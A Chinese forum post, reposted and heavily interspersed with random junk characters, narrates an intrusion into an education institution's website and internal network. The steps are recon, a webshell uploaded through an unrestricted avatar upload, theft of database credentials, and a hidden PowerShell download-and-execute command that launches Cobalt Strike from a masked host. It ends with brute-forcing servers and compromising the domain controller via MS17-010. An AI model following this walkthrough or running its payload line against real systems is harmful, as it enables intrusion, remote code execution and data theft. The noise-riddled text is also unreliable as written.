|
$ I: `$ D8 a; I( [$ l+ E6 i$ D5 K 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
; I! j0 x$ E) v( ]
$ W3 }2 _& f1 _! V2 A, M
1 o0 U9 @9 b/ L' }; i & _& T/ D2 K$ f+ s4 @- V. `- t* j
& N( i8 B# U S7 Z7 g' z. `1 D# @! x" l; X' x6 e: \
正文
6 I) q( H5 f6 A % E* c& I0 g3 _0 m. _/ C! @
! M* }+ R0 Z, m p W/ }
+ L8 C+ Y5 Z. k. ^) y - Q, Z& q+ a: _- F5 ^
: \, s( W, L5 q! t0 h, j) w) p 目标:www.xxxx.com(一家教育机构)
1 i/ k% z# O; p+ t; I6 X9 N打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
4 l' k3 `3 m5 I' {) C5 }( z
: j& a4 }2 p: h+ r8 T4 T* P
0 K4 _! ?+ `6 |( p. v: J( V  5 j0 e) u% W; S" A
! S5 c. U) a `: g# y
9 p: K0 ?2 O: a( g+ S- @ 进行了简单的信息搜集
& x/ |$ W( {, a e
7 ?' I9 t" x4 p$ O! y) W
m+ ~3 U# E# D J* o
, C, ]& b1 L `' ?9 Z! \0 _8 _ a' N+ H! z
子域名搜集
8 h9 \0 {3 ?" e( z7 N" ~ ' G% l7 c+ A. u3 p: k' k V
7 @/ x/ P# u" Y K
 ) o$ p2 s2 e6 w1 i8 m1 F, I
% j9 W4 S3 o1 O# g% H4 c
! H: p0 H& W @$ B% A# D! a9 k fofa找资产
' u" R( @7 V! D! W% X$ u) e) e8 h: Y
- a, Z0 m$ K. G: N" T4 u
1 i8 n, M; d; } v ' r0 o# T( a: U: n& n, A6 \4 j
& Y, T4 g- ~, P# p. @' x- u$ h" `7 X 
5 g% ^6 y& x; l( B+ u$ E
3 O, x' z8 x8 H: L+ {" p/ p' q9 Q2 n' o5 Z5 b: }5 c! D
一共七个资产。去重之后只有两个。
8 L0 R4 P2 i4 |; h8 m, _2 i: v, v
; o: s9 D* _+ B1 \, Y
; R0 l1 ? ]3 O$ }* R: b4 {" r , A# q3 j; f% |. N q) t" @+ t
& P: \. D# n$ Z p6 \, B
目录探测4 r9 X0 G l- j5 ] q: a
/ l7 j: Z& |. v( c' d# k6 Y
6 L1 @& t% [6 z4 p1 g" Y$ s/ g# T
 % H" c: }! j' p0 I+ }
# P8 U8 q; H+ k0 I
- A8 o O5 Z5 |! K6 o 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
P; g I* ^, X& y7 b
7 h) R! Q% d `3 ^1 P- C0 {* o
0 n/ A5 c; F3 k
/ n# [8 O$ k3 r, }" \
3 p2 q8 P' b- c9 K/ J# k$ W0 \
我又尝试了通过修改返回包来绕过登录界面
+ P7 e' O$ [3 s b
% d0 d& @9 Y H6 Y/ o9 }+ W
0 L" ?. [1 w9 X! X) s  % Q* U c# G$ P6 Z; X/ U
. s1 O$ W8 j- e# s |2 q9 ^: v: @* J5 Z" |" a6 t- v- O# g" `
还是不行,尝试注入无果 Z+ A* x3 b9 m4 z) `3 W
9 X* ?( v. W* c& S
7 a8 F. W% G, L$ M+ H. \, P5 V" g
 . {! Z8 n. b5 K F
+ N* q, |8 T/ R% e, W. A" z
5 |. t2 P1 Q- b, P/ A" v 不过我目录探测出了一处Spring信息泄露
: J+ R( ?$ I! u
2 R5 R; S' j# J, f" r, }
4 n/ ~7 Z( m: d, D, `: I' X1 l" o2 r 0 J; g$ B7 q3 M w$ n1 v: {
/ [; x+ _" n5 T6 K4 b! q* F
6 _) o: |& D6 O( x3 w
) N3 d9 N% V; V6 E6 o7 J+ ^! }) m2 {* v4 R' G, U& V
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
- ]: Z7 n% N8 ^1 I
: {4 A: h" @; t, U3 I! N+ l# o1 ~. s. I; v' b
4 k2 x0 I) z8 S' C 8 k1 e3 p( s. [! h
( k0 n0 F* ?+ d6 |" q8 ^8 f5 M, G 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。5 A; u; X; h5 N4 n; j
2 z. g/ T& C0 V$ @
, a. y3 L8 x0 g  4 H9 Y, I& M; g4 k, R! g) N
3 T8 L/ G& B( L' O+ I& c0 \
: k. @7 ?) [: ]# a( F 获取有些师傅到这一步就手机抓包电脑测了。6 E( u8 F9 ~. V/ L. Y1 s/ _
) B4 x: Q. @& z3 U8 d, W0 d( N+ c7 c
; W. c1 X0 z7 } Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 Z) x, c: t$ `
& O) X4 i( p) ?1 Q1 j, g* x0 O0 X% _9 O; ~4 Z. i% D* V3 S
其中在一个公众号发现了小程序,可以进行注册。! m. Z5 w+ T4 q% Z. w
, ?: f [, c8 M! K7 B- ?/ E I( e
3 F2 v+ v3 H2 H" x- v) s. d' U
看到了头像上传,尝试上传获取WebShell
2 E) p9 u! ?9 Y/ ?' z; g ; d$ a- l" S+ [$ K3 e+ u
; h$ C+ n& L) s  : C P2 U% ]: W4 R
. N& c8 { E8 U2 u" {8 H) |" c9 i: t; f2 ~3 m1 C M
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问+ ~0 i4 R& o F, i/ U
" `8 f5 y0 [/ u6 H- [. O% E: l3 |" o2 J, B- f! w3 X) l. V
 & b5 J& |" X6 P- ?. O+ C
% s! C" ?2 a7 d8 T" }
& v+ z# r& M1 f& M% V9 u5 t 然后上了大马
9 I' }! s+ H x2 h3 P
. @" {& |' H. O5 t, |
1 f/ e8 l0 Y$ P+ C: o$ m( e 
G: e4 K) n' k% v$ f2 K/ g
/ O9 G0 C+ x/ e) L: n% w# W: h- h4 [' R0 R4 W
 4 q r& i7 p* K# a- L
( A3 c* P5 M0 N/ m( f
$ h& i1 \$ k! x' { n+ \: a 通过翻找文件发现数据库账号密码
t! m a) p$ u% E; h# p: u1 K
) n7 `8 h/ U7 B! _ d# k
0 j* D/ K, u* r3 M" q  3 u2 _, a1 T& A% J1 }* @
4 u, P7 h: C/ P6 `6 E# k7 L9 A I0 v5 @/ t. f7 `" n
--内网渗透
9 X4 Q# Q, f. ]- M& q8 t! P # ]3 e- Y! o$ y' {+ N& n
5 z. K9 |" u7 A) @ 直接通过powershell执行 cs上线
B8 B3 w- X9 C' k! ~; F
+ C4 A* R: S/ I6 Q" F3 e8 z' d/ }8 I# l# P9 q. U
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"4 P. \! ]3 o5 q( v
, u2 O ^4 c0 C- T0 C! m5 ?& E. u# q
& P9 K( {3 c# w3 q; i( u  6 ]$ d# _9 V5 P4 u8 q: F
, \ H" [9 _8 a/ z: j
* q& f$ I: d+ m. g) H. o 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
7 v4 w, e( L8 g9 ]+ t/ {
/ z: ^+ y* R% D! h$ e
1 j; A! I6 t9 [+ y: @. G 
E4 N3 D" h/ ?
, u' i/ T j/ C6 {3 z# a, e* _9 c( k3 N- O0 J
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
: D+ ?& n( g" k4 P: q- m
}5 d; }; b p5 c
1 u' Q5 T# {& G6 u
5 q0 u5 L* E) z# o n! \
" `7 m0 \: U0 |
' Z8 i# _# l& [, w; z/ ]3 K  5 A! l$ D7 D5 T6 g8 |5 w0 q* [; ~8 K) }
# |6 h' k: K! N/ M: l7 r5 }9 [
% d6 ~ o- ~0 w8 c3 a2 g+ D ], k
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
, C: g$ N* K' v& o; v
/ z# O, t$ A# L
/ b( G( r4 {2 ]) R8 u" B; x 1 {4 S7 _2 J9 h" ^$ z4 z
7 C) n9 m, a2 v) t
' d& N" v9 x4 `5 `! U ! Y4 a8 b0 a' c$ t
. s# Q1 l0 h* ^% J
( c e% M0 b& m8 F) } L
0 b7 B/ `( ^& h0 l" h* w' ~ r( z5 h: K
" z3 w E1 B E, }
6 j5 D8 m6 V) O/ E# ^ 3 F7 G$ z. M6 y- }/ Y. |
; `7 `0 U4 h) q
/ B% T" S" k" H, t% v8 j s# L 小结
, a, D' V% B2 B5 z0 ^7 j 0 r# r# U' v- a2 v
; V' q i7 D! @
6 e# O9 `4 G" ~, s# C( [( [ ) ]$ x! d) ]# L3 T# ^3 m
6 X6 M) ^6 g" i! Q5 `* P8 o: ?% a 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!! ?" L& J6 I: W0 R: Z' t
, N9 t- M' K' Z- \$ K4 B7 k# N# ~6 y
8 w4 K8 H7 ~/ L9 B* X$ ^
/ p5 e' W( i$ K. W& X) v
$ N" d+ p' I/ m4 u
) Q; o4 s- e( C+ T - 0 Z! J* @1 k* y3 A' j
, t2 A _' w9 T1 n2 o; N( l
7 t; G% _5 o, }! u* O6 i4 X, F- V n6 E0 @3 D
-
0 z: T0 D. i, g4 G
7 a+ [* o( ~! p C
0 T1 N- Z9 O* n! d& k5 d* s/ Q& }
: `# @9 h& \. k. G( L! w! ^4 J! ]$ @6 E
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html% Z* B8 K+ M! B n
( J/ c2 @# l* h! W. k5 o5 d3 k
m% @8 N8 F. }7 O/ \; V* U8 s
- _. n, B( G; K% _ | 
发表于 2024-3-1 19:41:32
收藏
支持
反对